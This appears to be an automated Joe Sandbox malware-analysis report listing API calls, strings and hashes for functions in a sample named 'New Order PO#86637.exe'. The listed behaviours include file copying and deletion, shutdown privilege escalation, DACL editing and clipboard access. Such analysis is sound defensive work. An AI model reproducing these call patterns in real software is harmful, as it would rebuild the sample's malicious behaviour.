                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                            • String ID:
                                                                            • API String ID: 2383988440-0
                                                                            • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                            • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                            APIs
                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\New Order PO#86637.exe,0040F545,C:\Users\user\Desktop\New Order PO#86637.exe,004A90E8,C:\Users\user\Desktop\New Order PO#86637.exe,?,0040F545), ref: 0041013C
                                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                            • _wcscat.LIBCMT ref: 0044BD94
                                                                            • _wcscat.LIBCMT ref: 0044BDBD
                                                                            • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                            • _wcscpy.LIBCMT ref: 0044BE71
                                                                            • _wcscat.LIBCMT ref: 0044BE83
                                                                            • _wcscat.LIBCMT ref: 0044BE95
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 2188072990-1173974218
                                                                            • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                            • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                            • FindClose.KERNEL32(00000000), ref: 00478924
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                            • __swprintf.LIBCMT ref: 004789D3
                                                                            • __swprintf.LIBCMT ref: 00478A1D
                                                                            • __swprintf.LIBCMT ref: 00478A4B
                                                                            • __swprintf.LIBCMT ref: 00478A79
                                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                            • __swprintf.LIBCMT ref: 00478AA7
                                                                            • __swprintf.LIBCMT ref: 00478AD5
                                                                            • __swprintf.LIBCMT ref: 00478B03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 999945258-2428617273
                                                                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                            • __wsplitpath.LIBCMT ref: 00403492
                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                            • _wcscpy.LIBCMT ref: 004034A7
                                                                            • _wcscat.LIBCMT ref: 004034BC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                            • _wcscpy.LIBCMT ref: 004035A0
                                                                            • _wcslen.LIBCMT ref: 00403623
                                                                            • _wcslen.LIBCMT ref: 0040367D
                                                                            Strings
                                                                            • _, xrefs: 0040371C
                                                                            • Error opening the file, xrefs: 00428231
                                                                            • Unterminated string, xrefs: 00428348
                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                            • API String ID: 3393021363-188983378
                                                                            • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                            • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                            • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                            • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                            • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                            • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                            • __swprintf.LIBCMT ref: 00431C2E
                                                                            • _wcslen.LIBCMT ref: 00431C3A
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2192556992-3457252023
                                                                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                            • __swprintf.LIBCMT ref: 004722B9
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: FolderPath$LocalTime__swprintf
                                                                            • String ID: %.3d
                                                                            • API String ID: 3337348382-986655627
                                                                            • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                            • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                            • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                            • FindClose.KERNEL32(00000000), ref: 00442930
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                            • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                            • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                            • GetLastError.KERNEL32 ref: 00433414
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 2938487562-3733053543
                                                                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                            APIs
                                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                            • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 1255039815-0
                                                                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 00433073
                                                                            • __swprintf.LIBCMT ref: 00433085
                                                                            • __wcsicoll.LIBCMT ref: 00433092
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                            • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                            • LockResource.KERNEL32(?), ref: 00433120
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                            • String ID:
                                                                            • API String ID: 1158019794-0
                                                                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
